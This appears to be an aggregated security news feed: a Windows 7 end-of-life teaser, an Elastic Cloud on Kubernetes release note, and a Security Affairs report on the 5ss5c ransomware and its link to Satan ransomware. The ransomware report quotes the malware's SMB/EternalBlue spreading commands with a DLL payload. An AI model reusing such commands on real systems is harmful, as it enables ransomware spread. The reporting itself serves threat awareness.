Microsoft Windows 7 – launched in 2009 – came to the end of its supported life on Tuesday. Despite Microsoft’s repeated warnings to Windows 7 users, there may still be a couple of hundred million users, many of them in businesses. What should people do next?

Continue reading...

Elastic Cloud on Kubernetes 1.0 is now available

Elastic Cloud on Kubernetes (ECK) is moving out of beta and into general availability. As Elastic announced with the alpha release of ECK back in May 2019, the vision for ECK is to provide an official way to orchestrate Elasticsearch on Kubernetes and provide a SaaS-like experience for Elastic products on Kubernetes. Kubernetes has continued to grow in popularity and has become the standard for orchestrating container workloads, and Elastic has seen a growing number … More

The post Elastic Cloud on Kubernetes 1.0 is now available appeared first on Help Net Security.

5ss5c Ransomware emerges after Satan went down in the hell

The cybercrime group behind Satan ransomware and other malware seems to be involved in the development of a new threat named 5ss5c.

The threat actors behind the Satan, DBGer and Lucky ransomware and likely Iron ransomware, is back with a new piece of malware named ‘5ss5c’.

The Bart Blaze believes that the threat actors have been working on the 5ss5c ransomware since at least November 2019, and likely the malicious code is still under development. Experts, in fact, discovered a second spreader module, packed with Enigma VirtualBox, within the code, that is named poc.exe.

“There’s quite some curiosities that indicate 5ss5c is still in active development and stems from Satan ransomware.” reads the analysis published by Blaze.

“This suggest they may be experimenting (poc often is an acronym for proof oconcept).”

The expert discovered several artifacts that suggest 5ss5c stems from Satan ransomware, he also pointed out that updates for Satan stopped in August while 5ss5c appeared in the threat landscape in November.

Like Satan, 5ss5c launches process via a downloader, leverages the EternalBlue exploit for spreading. Blaze added that several Satan artefacts, and tactics, techniques and procedures (TTPs) have similarities with both Satan and DBGer, and partially with Iron.

The file poc.exe is dropped to C:\ProgramData\poc.exe, and runs the command:

cd /D C:\ProgramData&star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload C:\ProgramData\down64.dll –TargetIp 

that is similar to the command executed by the Satan ransomware:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe –TargetIp & star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload down64.dll –TargetIp

Both Satan and 5ss5c have an exclusion list of files that are not encrypted by the malicious codes, the list of the new ransomware include additional files like the one associated with Qih00 360 security solutions (i.e. 360download and 360safe files).

The 5ss5c ransomware drops a ransom note in Chinese that demands the a ransom of 1 bitcoin for decryption.

5ss5c

The ransom demand will double after 48 hours. The ransom note doesn’t include attackers’email to contact for the payment or a Bitcoin address, instead the ransomware prepends the email address (5ss5c(at)mail[.]ru) to the file name of each encrypted file, for example test.txt becomes [5ss5c@mail.ru]test.txt.Y54GUHKIG1T2ZLN76II9F3BBQV7MK4UOGSQUND7U.5ss5c.

“Whoever’s behind the development of Satan, DBGer, Lucky and likely Iron ransomware, is back in business with the 5ss5c ransomware, and it appears to be in active development – and is trying to increase (or perhaps focus?) its targeting and spread of the ransomware.” concludes the expert.

The analysis published by Blaze includes the indicators of compromise (IOCs).

Pierluigi Paganini

(SecurityAffairs – cybercrime, ransomware)

The post 5ss5c Ransomware emerges after Satan went down in the hell appeared first on Security Affairs.